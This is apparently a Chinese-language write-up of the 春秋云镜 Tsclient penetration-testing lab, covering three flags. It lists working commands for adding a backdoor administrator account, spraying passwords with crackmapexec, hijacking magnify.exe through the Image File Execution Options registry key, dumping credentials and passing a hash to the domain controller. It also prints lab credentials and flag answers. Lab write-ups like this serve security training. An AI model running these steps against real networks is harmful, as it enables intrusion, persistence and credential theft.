又写了个春秋云镜的靶场,学到了挺多东西。
春秋云镜-Tsclient
flag01
依旧是fscan扫一下
1 | start infoscan |
发现数据库账号密码
利用MDUT梭了。
利用土豆提权,成功拿到systen权限
添加用户,以及添加用户组,开放3389端口
1 | net user fffffilm Password@973 /add |
成功登录
拿下第一个flag
flag01: flag{89df4bd3-ad34-49ad-ac02-1878eb0e7459}
flag02
配代理扫内网。
ipconfig发现网段:172.22.8.18
fscan开扫
1 | start infoscan |
整理一下信息
- 172.22.8.15 域控
- 172.22.8.18 已经打完了
- 172.22.8.31 域内机器
- 172.22.8.46 域内机器
现在就没什么思路了。
但是想到flag1里提到关注user session。那就看看有什么用户。
发现还有一个john用户。
先CS上线便于下面操作,这里注意要system运行木马,我一开始忘了,浪费好多时间。
注入进程
成功。之后查看网络资源
1 | shell net use |
拿到一个账号密码,并且这里提到了映像劫持。
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#
先进行密码喷洒。
1 | proxychains crackmapexec smb 172.22.8.1/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null |
发现密码已经过期了。那我们对密码进行修改
拿上新密码:Fffffilm@123456进行登录。启动rdp,发现46可以登录
1 | proxychains4 rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Fffffilm@123456' -r disk:share=/home/kali/Desktop/fffffilm |
修改注册表,利用放大镜提权。
1 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" |
成功拿到system权限。
flag02: flag{9907d541-3a58-4226-b1ae-244cdd480049}
flag03
先在18和46都拿下了。还差DC域控和31
利用18进行端口转发将46上线cs。
查看域管
1 | shell net group "domain admins" /domain |
抓取哈希
1 | logonpasswords |
横向实现域控。
1 | proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 14ac45817d3e1046b80b23dc198ed606 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt" |
flag03: flag{86ae5eda-7df3-46c7-9cdb-24566e3dd2d4}